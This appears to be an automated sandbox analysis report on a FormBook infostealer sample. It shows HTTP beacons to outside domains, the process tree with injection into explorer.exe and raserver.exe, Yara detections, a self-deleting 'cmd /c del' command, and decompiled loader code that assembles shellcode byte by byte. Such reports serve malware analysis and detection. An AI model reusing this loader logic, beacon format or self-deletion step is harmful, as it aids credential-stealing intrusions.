                                                                      Jul 22, 2021 18:05:45.750710964 CEST9861INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20
                                                                      Data Ascii: margin: 0 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:imag
                                                                      Jul 22, 2021 18:05:45.750792980 CEST9862INData Raw: 57 34 48 38 69 49 30 67 42 32 4d 7a 66 45 63 56 33 67 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b 2b 42 76 67 71
                                                                      Data Ascii: W4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+HxDHT
                                                                      Jul 22, 2021 18:05:45.750893116 CEST9864INData Raw: 35 31 53 6d 4f 35 77 77 68 70 48 58 61 63 30 45 33 45 51 45 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34 64 77 6d 48 63 6b 57 45 72 4a 73 6d 55 37 65 49 73 47 6e 4c 78 70 56 70 56 45 54 49 34 6b 56 4d 33 56 43 55 77 31
                                                                      Data Ascii: 51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJ
                                                                      Jul 22, 2021 18:05:45.750974894 CEST9865INData Raw: 6a 36 30 42 63 69 38 6f 65 2b 45 4b 45 50 72 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76
                                                                      Data Ascii: j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5Er
                                                                      Jul 22, 2021 18:05:45.751004934 CEST9866INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64
                                                                      Data Ascii: <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> www.vermogenswerte.com/cp_errordocument.shtml
                                                                      Jul 22, 2021 18:05:45.751020908 CEST9866INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.54974075.2.81.22180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:05:50.873647928 CEST9867OUTGET /dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.thenorthgoldline.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:05:51.027597904 CEST9869INHTTP/1.1 403 Forbidden
                                                                      Date: Thu, 22 Jul 2021 16:05:51 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Server: nginx
                                                                      Vary: Accept-Encoding
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.54974334.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jul 22, 2021 18:06:08.622399092 CEST9871OUTGET /dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.extinctionbrews.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jul 22, 2021 18:06:08.765433073 CEST9872INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 22 Jul 2021 16:06:08 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60ef6789-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: pMbPS8nCm1.exe PID: 3492 Parent PID: 5672

                                                                      General

                                                                      Start time:18:04:32
                                                                      Start date:22/07/2021
                                                                      Path:C:\Users\user\Desktop\pMbPS8nCm1.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\pMbPS8nCm1.exe'
                                                                      Imagebase:0x400000
                                                                      File size:177067 bytes
                                                                      MD5 hash:DE87F1794377537DDA721AFD9137E491
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: pMbPS8nCm1.exe PID: 5800 Parent PID: 3492

                                                                      General

                                                                      Start time:18:04:33
                                                                      Start date:22/07/2021
                                                                      Path:C:\Users\user\Desktop\pMbPS8nCm1.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\pMbPS8nCm1.exe'
                                                                      Imagebase:0x400000
                                                                      File size:177067 bytes
                                                                      MD5 hash:DE87F1794377537DDA721AFD9137E491
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: explorer.exe PID: 3472 Parent PID: 5800

                                                                      General

                                                                      Start time:18:04:38
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                      Imagebase:0x7ff693d90000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: raserver.exe PID: 4564 Parent PID: 3472

                                                                      General

                                                                      Start time:18:05:00
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\SysWOW64\raserver.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                      Imagebase:0xeb0000
                                                                      File size:108544 bytes
                                                                      MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: cmd.exe PID: 4396 Parent PID: 4564

                                                                      General

                                                                      Start time:18:05:05
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
                                                                      Imagebase:0x150000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: conhost.exe PID: 2196 Parent PID: 4396

                                                                      General

                                                                      Start time:18:05:05
                                                                      Start date:22/07/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7ecfc0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >

                                                                        Analysis Process: pMbPS8nCm1.exe PID: 3492 Parent PID: 5672 pMbPS8nCm1.exeCOMMON

                                                                        Executed Functions

                                                                        Function 006E06DA, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 006E07B4
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 006E07DE
                                                                        • ReadFile.KERNELBASE(00000000,00000000,006E026C,?,00000000), ref: 006E07F5
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 006E0817
                                                                        • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,006E01AE,7FDFFF66), ref: 006E088A
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 006E0895
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,006E01AE), ref: 006E08E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.248592204.00000000006E0000.00000040.00000001.sdmp, Offset: 006E0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                        • String ID:
                                                                        • API String ID: 656311269-0
                                                                        • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                                        • Instruction ID: 83dcd20488f183a8e8b6622203aad0e8a49d1873d73e6a2a9f2d232a8e478122
                                                                        • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                                                        • Instruction Fuzzy Hash: 1061B730E01348ABEF10DFA5C880BAEB7B6AF48710F244169F505EB385DBB49D818B94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401000, Relevance: 352.4, APIs: 2, Strings: 199, Instructions: 673COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			_entry_() {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v413;
				char _v414;
				char _v415;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v429;
				char _v430;
				char _v431;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
				char _v436;
				char _v437;
				char _v438;
				char _v439;
				char _v440;
				char _v441;
				char _v442;
				char _v443;
				char _v444;
				char _v445;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				char _v477;
				char _v478;
				char _v479;
				char _v480;
				char _v481;
				char _v482;
				char _v483;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				char _v504;
				char _v505;
				char _v506;
				char _v507;
				char _v508;
				char _v509;
				char _v510;
				char _v511;
				char _v512;
				char _v513;
				char _v514;
				char _v515;
				char _v516;
				char _v517;
				char _v518;
				char _v519;
				char _v520;
				char _v521;
				char _v522;
				char _v523;
				char _v524;
				char _v525;
				char _v526;
				char _v527;
				char _v528;
				char _v529;
				char _v530;
				char _v531;
				char _v532;
				char _v533;
				char _v534;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v545;
				char _v546;
				char _v547;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				char _v553;
				char _v554;
				char _v555;
				char _v556;
				char _v557;
				char _v558;
				char _v559;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v565;
				char _v566;
				char _v567;
				char _v568;
				char _v569;
				char _v570;
				char _v571;
				char _v572;
				char _v573;
				char _v574;
				char _v575;
				char _v576;
				char _v577;
				char _v578;
				char _v579;
				char _v580;
				char _v581;
				char _v582;
				char _v583;
				char _v584;
				char _v585;
				char _v586;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				char _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v605;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				char _v621;
				char _v622;
				char _v623;
				char _v624;
				char _v625;
				char _v626;
				char _v627;
				char _v628;
				char _v629;
				char _v630;
				char _v631;
				char _v632;
				char _v633;
				char _v634;
				char _v635;
				char _v636;
				char _v637;
				char _v638;
				char _v639;
				char _v640;
				char _v641;
				char _v642;
				char _v643;
				char _v644;
				char _v645;
				char _v646;
				char _v647;
				char _v648;
				char _v649;
				char _v650;
				char _v651;
				char _v652;
				char _v653;
				char _v654;
				char _v655;
				char _v656;
				char _v657;
				char _v658;
				char _v659;
				_Unknown_base(*)() _v660;
				void* _v1660;
				int _t658;

				_v660 = 0xe9;
				_v659 = 0x90;
				_v658 = 0;
				_v657 = 0;
				_v656 = 0;
				_v655 = 0x55;
				_v654 = 0x8b;
				_v653 = 0xec;
				_v652 = 0x56;
				_v651 = 0x8b;
				_v650 = 0x75;
				_v649 = 8;
				_v648 = 0xba;
				_v647 = 0x73;
				_v646 = 0x14;
				_v645 = 0;
				_v644 = 0;
				_v643 = 0x57;
				_v642 = 0xeb;
				_v641 = 0xe;
				_v640 = 0x8b;
				_v639 = 0xca;
				_v638 = 0xd1;
				_v637 = 0xe8;
				_v636 = 0xc1;
				_v635 = 0xe1;
				_v634 = 7;
				_v633 = 0x46;
				_v632 = 0xb;
				_v631 = 0xc8;
				_v630 = 3;
				_v629 = 0xcf;
				_v628 = 3;
				_v627 = 0xd1;
				_v626 = 0xf;
				_v625 = 0xbe;
				_v624 = 0x3e;
				_v623 = 0x8b;
				_v622 = 0xc2;
				_v621 = 0x85;
				_v620 = 0xff;
				_v619 = 0x75;
				_v618 = 0xe9;
				_v617 = 0x5f;
				_v616 = 0x5e;
				_v615 = 0x5d;
				_v614 = 0xc3;
				_v613 = 0x55;
				_v612 = 0x8b;
				_v611 = 0xec;
				_v610 = 0x51;
				_v609 = 0x51;
				_v608 = 0x53;
				_v607 = 0x56;
				_v606 = 0x57;
				_v605 = 0x8b;
				_v604 = 0x7d;
				_v603 = 8;
				_v602 = 0x33;
				_v601 = 0xf6;
				_v600 = 0x8b;
				_v599 = 0x47;
				_v598 = 0x3c;
				_v597 = 0x8b;
				_v596 = 0x44;
				_v595 = 0x38;
				_v594 = 0x78;
				_v593 = 3;
				_v592 = 0xc7;
				_v591 = 0x8b;
				_v590 = 0x50;
				_v589 = 0x20;
				_v588 = 0x8b;
				_v587 = 0x58;
				_v586 = 0x1c;
				_v585 = 3;
				_v584 = 0xd7;
				_v583 = 0x8b;
